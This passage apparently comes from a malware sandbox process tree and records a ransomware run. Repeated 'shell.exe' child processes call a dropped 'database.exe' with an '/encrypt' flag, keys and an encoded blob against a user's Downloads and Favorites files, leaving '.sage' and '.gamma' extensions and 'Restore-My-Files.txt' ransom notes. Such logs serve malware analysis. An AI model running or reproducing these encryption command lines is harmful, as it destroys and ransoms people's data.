                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\MergeConvertFrom.pptm.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4364
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\OutDisable.wmv.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1676
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\OutUnpublish.wmf.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:5996
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\PopConvert.txt.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\PushRedo.xlsm.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2572
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\README_sTlLoTpq.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\RemoveInstall.AAC.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\UnpublishStop.MOD.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\UnpublishSubmit.wvx.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3704
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Downloads\WatchGet.wmv.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6308
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Links\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5680
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Links\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Links\Suggested Sites.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\Microsoft Websites\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:6108
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\MSN Autos.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\MSN Entertainment.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Favorites\MSN Websites\MSN Money.url.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
